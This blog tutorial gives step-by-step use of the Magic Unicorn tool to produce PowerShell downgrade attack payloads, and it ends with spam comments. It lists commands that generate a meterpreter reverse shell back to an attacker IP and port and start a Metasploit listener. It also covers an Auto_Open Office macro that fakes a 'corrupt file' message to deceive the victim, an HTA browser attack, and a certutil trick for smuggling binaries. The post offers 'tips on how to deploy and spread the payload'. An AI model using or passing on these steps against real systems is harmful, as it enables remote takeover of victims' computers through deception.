Magic Unicorn V 2.0 PowerShell Downgrade Attack

magic-unicornMagic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory based on Matthew Graeber’s powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and josh Kelly at Defcon 18.

Usage is simple, Just run Magic Unicorn (ensure Metasploit is installed and in the right path) and magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system.

 

Getting Started

Go over to TrustedSec GitHub Unicorn Repository and download the latest version of unicorn by clicking the Download Zip button on the left of the page.

Once downloaded, extract the zip file to somewhere easy to find. e.g. Desktop.

Open up a terminal and navigate to where ever you extracted unicorn and type this command.

python unicorn.py

you should get presented with a nice ASCII picture of a unicorn and below some examples of the different commands.

unicorn commands

I will run through each Example individually below with some tips on how to deploy and spread the payload.

Powershell Attack

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443

This command sets up a reverse_tcp meterpreter payload going back to an ip address or hostname over port 443.

After you run the command it generates two files powershell_attack.txt and unicorn.rc. the text file contains all of the code needed in order to inject the PowerShell attack into memory.

The rc file can be used with metasploit to quickly open up listener on the port you specified in the command.

msfconsole -r unicorn.rc

When the listener is all set up, open up the powershell_attack.txt file and copy that directly into command  prompt, hit enter and you will shortly receive a session in Metasploit.

Macro Attack

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro

macro added to the end of the command formats the powershell_attack.txt file to be inserted as a macro into word or excel.

Open up word or excel go to File, Properties, Ribbons, and select Developer. Once you do that, you will have a developer tab. Create a new macro, call it Auto_Open and paste the generated code into that. This will automatically run. Note that a message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim to thinking the excel document is corrupted. You should get a shell through powershell injection after that.

NOTE: WHEN COPYING AND PASTING INTO EXCEL, IF THERE ARE ADDITIONAL SPACES THAT ARE ADDED YOU NEED TO REMOVE THESE AFTER EACH OF THE POWERSHELL CODE SECTIONS UNDER VARIABLE “x” OR A SYNTAX ERROR WILL HAPPEN!

HTA Attack

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 hta

The HTA attack will automatically generate two files, the first the index.html which tells the browser to use Launcher.hta which contains the malicious powershell injection code. All files are exported to the hta_access/ folder and there will be three main files. The first is index.html, second Launcher.hta and the last, the unicorn.rc file. You can run msfconsole -r unicorn.rc to launch the listener for Metasploit.

A user must click allow and accept when using the HTA attack in order for the powershell injection to work properly.

Cerutil Attack

python unicorn.py <path_to_payload/exe_encode> crt

The certutil attack vector was identified by Matthew Graeber (@mattifestation) which allows you to take a binary file, move it into a base64 format and use certutil on the victim machine to convert it back to a binary for you. This should work on virtually any system and allow you to transfer a binary to the victim machine through a fake certificate file. To use this attack, simply place an executable in the path of unicorn and run python unicorn.py <exe_name> crt in order to get the base64 output. Once thats finished, go to decode_attack/ folder which contains the files. The bat file is a command that can be run in a windows machine to convert it back to a binary.

Custom PS1 Attack Instructions

This attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro.

Note if choosing the macro option, a large ps1 file may exceed the amount of carriage returns allowed by VBA. You may change the number of characters in each VBA string by passing an integer as a parameter.

Examples:
python unicorn.py harmless.ps1
python unicorn.py myfile.ps1 macro
python unicorn.py muahahaha.ps1 macro 500
 

The last one will use a 500 character string instead of the default 380, resulting in less carriage returns in VBA.

15 Comments

  1. After study a few of the blog posts on your website now, and I truly like your way of blogging. I bookmarked it to my bookmark website list and will be checking back soon. Pls check out my web site as well and let me know what you think.

  2. When I originally commented I clicked the -Notify me when new comments are added- checkbox and now each time a comment is added I get four emails with the same comment. Is there any way you can remove me from that service? Thanks!

  3. Understanding hard labor a person place within your blogging site along with detailed information you offer. It’s best for discover web site every once in a although that isn’t the standard re-spun information. Superb browse! I’ve stashed your internet site in addition to I’m introducing your Nourishes to my favorite Google account.

  4. I enjoy whatever you people can be away likewise. Such type of brilliant employment together with contact! Sustain your terrific will work people I’ve added you guys so that you can blogroll.

  5. I’ve felt a numerous gear to savor grand slam Roland Garros nowadays like look into the web site hyper-linked. All of these web pages offer very good information relevant to the French Open. Nevertheless, the web links usually are not performing at this moment. How one can keep an eye on tennis games on laptop? Any of us here to aid?

    1. Not sure what this has to do with anything on my blog or the Powershell downgrade attack, so i removed your link to your site and try googling instead of posting on random blogs…. TWAT.

  6. I presume this really is among the most very important material I think. As well as i’m relieved reading through your current report. Then again must thoughts concerning number of basic factors, This website taste is ideal, your web content is admittedly terrific.

  7. This article is really cool. I have bookmarked it. Do you allow guest post on your blog ?
    I can provide high quality articles for you. Let me know.

Leave a Reply

Your email address will not be published.